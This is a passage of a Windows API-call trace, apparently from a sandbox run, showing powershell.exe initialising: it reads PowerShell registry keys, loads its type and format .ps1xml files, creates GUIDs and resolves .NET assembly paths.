lpValue="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0076.905] GetLastError () returned 0x3f0 [0076.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.968] GetLastError () returned 0xcb [0076.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.970] GetLastError () returned 0xcb [0077.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.009] GetLastError () returned 0xcb [0077.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.009] GetLastError () returned 0xcb [0077.033] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce410 | out: phkResult=0xce410*=0x340) returned 0x0 [0077.048] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce478, lpData=0x0, lpcbData=0xce474*=0x0 | out: lpType=0xce478*=0x1, lpData=0x0, lpcbData=0xce474*=0x74) returned 0x0 [0077.050] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce458, lpData=0x0, lpcbData=0xce454*=0x0 | out: lpType=0xce458*=0x1, lpData=0x0, lpcbData=0xce454*=0x74) returned 0x0 [0077.050] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce458, lpData=0x2d1690, lpcbData=0xce454*=0x74 | out: lpType=0xce458*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xce454*=0x74) returned 0x0 [0077.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcdfd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0077.051] GetLastError () returned 0xcb [0077.051] SetErrorMode (uMode=0x1) returned 0x1 [0077.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", fInfoLevelId=0x0, lpFileInformation=0xce458 | out: lpFileInformation=0xce458) returned 1 [0077.051] GetLastError () returned 0xcb [0077.051] SetErrorMode (uMode=0x1) returned 0x1 [0077.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.057] GetLastError () returned 0xcb [0077.057] SetErrorMode (uMode=0x1) returned 0x1 [0077.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", fInfoLevelId=0x0, lpFileInformation=0xce44c | out: lpFileInformation=0xce44c) returned 1 [0077.062] GetLastError () returned 0xcb [0077.062] SetErrorMode (uMode=0x1) returned 0x1 [0077.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0077.067] GetLastError () returned 0xcb [0077.067] SetErrorMode (uMode=0x1) returned 0x1 [0077.067] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", fInfoLevelId=0x0, lpFileInformation=0xce44c | out: lpFileInformation=0xce44c) returned 1 [0077.068] GetLastError () returned 0xcb [0077.068] SetErrorMode (uMode=0x1) returned 0x1 [0077.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.086] GetLastError () returned 0xcb [0077.089] GetACP () returned 0x4e4 [0077.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcde5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.129] GetLastError () returned 0x0 [0077.129] SetErrorMode (uMode=0x1) returned 0x1 [0077.132] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0077.132] GetLastError () returned 0x0 [0077.134] GetFileType (hFile=0x344) returned 0x1 [0077.134] SetErrorMode (uMode=0x1) returned 0x1 [0077.134] GetFileType (hFile=0x344) returned 0x1 [0077.137] ReadFile (in: hFile=0x344, lpBuffer=0x2b4083c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b4083c*, lpNumberOfBytesRead=0xce3c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.160] GetLastError () returned 0x0 [0077.162] ReadFile (in: hFile=0x344, lpBuffer=0x2b4083c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b4083c*, lpNumberOfBytesRead=0xce3c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.162] GetLastError () returned 0x0 [0077.162] ReadFile (in: hFile=0x344, lpBuffer=0x2b4083c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b4083c*, lpNumberOfBytesRead=0xce3c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.162] GetLastError () returned 0x0 [0077.163] ReadFile (in: hFile=0x344, lpBuffer=0x2b4083c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b4083c*, lpNumberOfBytesRead=0xce3c4*=0xcf3, lpOverlapped=0x0) returned 1 [0077.163] GetLastError () returned 0x0 [0077.163] ReadFile (in: hFile=0x344, lpBuffer=0x2b3fccf, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b3fccf*, lpNumberOfBytesRead=0xce3c4*=0x0, lpOverlapped=0x0) returned 1 [0077.163] GetLastError () returned 0x0 [0077.163] ReadFile (in: hFile=0x344, lpBuffer=0x2b4083c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b4083c*, lpNumberOfBytesRead=0xce3c4*=0x0, lpOverlapped=0x0) returned 1 [0077.163] GetLastError () returned 0x0 [0077.164] CloseHandle (hObject=0x344) returned 1 [0077.164] GetLastError () returned 0x0 [0077.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.166] GetLastError () returned 0x0 [0077.166] SetErrorMode (uMode=0x1) returned 0x1 [0077.166] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", fInfoLevelId=0x0, lpFileInformation=0x2b51bb0 | out: lpFileInformation=0x2b51bb0) returned 1 [0077.167] GetLastError () returned 0x0 [0077.167] SetErrorMode (uMode=0x1) returned 0x1 [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.169] GetLastError () returned 0x0 [0077.169] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce348 | out: phkResult=0xce348*=0x344) returned 0x0 [0077.169] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce390, lpData=0x0, lpcbData=0xce38c*=0x0 | out: lpType=0xce390*=0x1, lpData=0x0, lpcbData=0xce38c*=0x56) returned 0x0 [0077.169] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce390, lpData=0x2d1690, lpcbData=0xce38c*=0x56 | out: lpType=0xce390*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce38c*=0x56) returned 0x0 [0077.170] RegCloseKey (hKey=0x344) returned 0x0 [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.171] GetLastError () returned 0x0 [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcde84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0077.171] GetLastError () returned 0x0 [0077.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce348 | out: phkResult=0xce348*=0x344) returned 0x0 [0077.467] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce390, lpData=0x0, lpcbData=0xce38c*=0x0 | out: lpType=0xce390*=0x1, lpData=0x0, lpcbData=0xce38c*=0x56) returned 0x0 [0077.468] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce390, lpData=0x2d1690, lpcbData=0xce38c*=0x56 | out: lpType=0xce390*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce38c*=0x56) returned 0x0 [0077.468] RegCloseKey (hKey=0x344) returned 0x0 [0077.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcdef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0077.473] GetLastError () returned 0x0 [0077.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcde84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0077.473] GetLastError () returned 0x0 [0077.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce40c | out: phkResult=0xce40c*=0x340) returned 0x0 [0077.964] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce474, lpData=0x0, lpcbData=0xce470*=0x0 | out: lpType=0xce474*=0x1, lpData=0x0, lpcbData=0xce470*=0x74) returned 0x0 [0077.964] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce454, lpData=0x0, lpcbData=0xce450*=0x0 | out: lpType=0xce454*=0x1, lpData=0x0, lpcbData=0xce450*=0x74) returned 0x0 [0077.965] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0xce454, lpData=0x2d1690, lpcbData=0xce450*=0x74 | out: lpType=0xce454*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xce450*=0x74) returned 0x0 [0077.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcdfd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0077.965] GetLastError () returned 0xcb [0077.965] SetErrorMode (uMode=0x1) returned 0x1 [0077.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", fInfoLevelId=0x0, lpFileInformation=0xce454 | out: lpFileInformation=0xce454) returned 1 [0077.965] GetLastError () returned 0xcb [0077.965] SetErrorMode (uMode=0x1) returned 0x1 [0077.975] GetTimeZoneInformation (in: lpTimeZoneInformation=0xce2f8 | out: lpTimeZoneInformation=0xce2f8) returned 0x2 [0078.023] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.023] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.023] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.024] RegCloseKey (hKey=0x310) returned 0x0 [0078.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.024] GetLastError () returned 0x0 [0078.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.024] GetLastError () returned 0x0 [0078.082] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5a4b6d33, Data2=0xf228, Data3=0x4ced, Data4=([0]=0xbd, [1]=0xcb, [2]=0x36, [3]=0x55, [4]=0x3a, [5]=0x24, [6]=0x99, [7]=0x4c))) returned 0x0 [0078.085] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5495ae2b, Data2=0x8c74, Data3=0x4a99, Data4=([0]=0xaa, [1]=0x71, [2]=0xba, [3]=0x2e, [4]=0xe4, [5]=0x3a, [6]=0x97, [7]=0x7c))) returned 0x0 [0078.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.090] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.090] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.091] RegCloseKey (hKey=0x310) returned 0x0 [0078.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.091] GetLastError () returned 0x0 [0078.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.091] GetLastError () returned 0x0 [0078.094] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x8b62a397, Data2=0x93f5, Data3=0x4022, Data4=([0]=0x8d, [1]=0xba, [2]=0x61, [3]=0xbe, [4]=0x39, [5]=0x62, [6]=0x35, [7]=0x14))) returned 0x0 [0078.101] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1a2a40f1, Data2=0x1e88, Data3=0x4fd4, Data4=([0]=0xb2, [1]=0xf3, [2]=0x39, [3]=0xaf, [4]=0xbe, [5]=0xfb, [6]=0x16, [7]=0xf))) returned 0x0 [0078.109] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4c0cc37e, Data2=0x1b76, Data3=0x4047, Data4=([0]=0xbf, [1]=0xd4, [2]=0x46, [3]=0xac, [4]=0xfd, [5]=0x69, [6]=0xc2, [7]=0x8c))) returned 0x0 [0078.109] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x729e7bed, Data2=0x359f, Data3=0x4f21, Data4=([0]=0xa6, [1]=0x9c, [2]=0xef, [3]=0xbc, [4]=0x0, [5]=0xd0, [6]=0xe2, [7]=0xfb))) returned 0x0 [0078.110] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9ae47d97, Data2=0x8eef, Data3=0x4c9b, Data4=([0]=0x9d, [1]=0xb7, [2]=0x10, [3]=0xd6, [4]=0xcd, [5]=0xaf, [6]=0x97, [7]=0xe5))) returned 0x0 [0078.110] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc599aca9, Data2=0x753f, Data3=0x4a63, Data4=([0]=0xa2, [1]=0x27, [2]=0x6b, [3]=0x99, [4]=0x2, [5]=0xd1, [6]=0x2d, [7]=0xb3))) returned 0x0 [0078.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.111] GetLastError () returned 0x0 [0078.111] SetErrorMode (uMode=0x1) returned 0x1 [0078.111] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.111] GetLastError () returned 0x0 [0078.111] GetFileType (hFile=0x310) returned 0x1 [0078.111] SetErrorMode (uMode=0x1) returned 0x1 [0078.111] GetFileType (hFile=0x310) returned 0x1 [0078.112] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.133] GetLastError () returned 0x0 [0078.134] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.159] GetLastError () returned 0x0 [0078.160] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.160] GetLastError () returned 0x0 [0078.160] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.160] GetLastError () returned 0x0 [0078.161] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.161] GetLastError () returned 0x0 [0078.161] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.161] GetLastError () returned 0x0 [0078.162] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0xaca, lpOverlapped=0x0) returned 1 [0078.162] GetLastError () returned 0x0 [0078.162] ReadFile (in: hFile=0x310, lpBuffer=0x2ec2682, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec2682*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.162] GetLastError () returned 0x0 [0078.162] ReadFile (in: hFile=0x310, lpBuffer=0x2ec3018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2ec3018*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.162] GetLastError () returned 0x0 [0078.162] CloseHandle (hObject=0x310) returned 1 [0078.162] GetLastError () returned 0x0 [0078.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcde24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.162] GetLastError () returned 0x0 [0078.162] SetErrorMode (uMode=0x1) returned 0x1 [0078.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", fInfoLevelId=0x0, lpFileInformation=0x2ee4014 | out: lpFileInformation=0x2ee4014) returned 1 [0078.163] GetLastError () returned 0x0 [0078.163] SetErrorMode (uMode=0x1) returned 0x1 [0078.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.163] GetLastError () returned 0x0 [0078.163] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.163] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.163] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.164] RegCloseKey (hKey=0x310) returned 0x0 [0078.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.164] GetLastError () returned 0x0 [0078.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.164] GetLastError () returned 0x0 [0078.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcdab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0078.191] GetLastError () returned 0x0 [0078.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcdab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0078.194] GetLastError () returned 0x57 [0078.207] GetLastError () returned 0x57 [0078.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcdab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.219] GetLastError () returned 0x57 [0078.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcdab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0078.224] GetLastError () returned 0x57 [0078.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcdab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0078.274] GetLastError () returned 0x57 [0078.324] VirtualQuery (in: lpAddress=0xccfa0, lpBuffer=0xcdfa0, dwLength=0x1c | out: 